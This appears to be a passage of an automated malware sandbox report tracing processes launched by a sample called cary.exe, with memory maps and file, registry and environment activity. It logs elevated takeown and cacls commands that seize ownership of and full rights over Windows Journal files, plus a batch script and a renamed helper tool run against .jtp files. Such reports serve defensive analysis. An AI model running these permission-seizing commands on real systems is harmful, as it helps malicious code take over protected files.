|
|
|
- |
Process #34: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Journal.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9a8 |
| Parent PID | 0x768 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
928
0x
96C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x044fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x0451ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004520000 | 0x04520000 | 0x04521fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004530000 | 0x04530000 | 0x04543fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0458ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x045cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x045d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000045e0000 | 0x045e0000 | 0x045e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046cffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e2d0000 | 0x7e2d0000 | 0x7e2f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e2fb000 | 0x7e2fb000 | 0x7e2fdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e2fe000 | 0x7e2fe000 | 0x7e2fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e2ff000 | 0x7e2ff000 | 0x7e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #35: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:01, Reason: Child Process |
| Unmonitor | End Time: 00:02:50, Reason: Self Terminated |
| Monitor Duration | 00:00:49 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa64 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A60
0x
A58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000290000 | 0x00290000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x0029ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x00423fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00430fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x00441fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x004c0000 | 0x0057dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04980000 | 0x04cb6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f440000 | 0x7f440000 | 0x7f53ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f540000 | 0x7f540000 | 0x7f562fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f566000 | 0x7f566000 | 0x7f568fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f569000 | 0x7f569000 | 0x7f56bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f56c000 | 0x7f56c000 | 0x7f56cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f56f000 | 0x7f56f000 | 0x7f56ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xd28, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xcb0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x958, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Seyes.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Seyes.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #37: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:02:05, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd28 |
| Parent PID | 0xa64 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE4
0x
D40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000660000 | 0x00660000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x00681fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x006a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00733fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00740fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00751fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb00000 | 0x7eb00000 | 0x7eb22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb2a000 | 0x7eb2a000 | 0x7eb2cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2d000 | 0x7eb2d000 | 0x7eb2dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2f000 | 0x7eb2f000 | 0x7eb2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #38: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:02:06, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb0 |
| Parent PID | 0xa64 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D94
0x
D48
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x04cfffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d21fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d30000 | 0x04d30000 | 0x04d43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04dcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dd0000 | 0x04dd0000 | 0x04dd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004de0000 | 0x04de0000 | 0x04de0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04df1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef60000 | 0x7ef60000 | 0x7ef82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef83000 | 0x7ef83000 | 0x7ef83fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef86000 | 0x7ef86000 | 0x7ef86fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef8d000 | 0x7ef8d000 | 0x7ef8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #39: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "To_Do_List.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa14 |
| Parent PID | 0xe18 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CDC
0x
67C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x04a4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a50000 | 0x04a50000 | 0x04a5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04a71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04a73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a80000 | 0x04a80000 | 0x04a93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c40000 | 0x04cfdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x0501ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0512ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05130000 | 0x05466fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e560000 | 0x7e560000 | 0x7e65ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e660000 | 0x7e660000 | 0x7e682fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e686000 | 0x7e686000 | 0x7e686fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e689000 | 0x7e689000 | 0x7e68bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e68c000 | 0x7e68c000 | 0x7e68cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e68d000 | 0x7e68d000 | 0x7e68ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
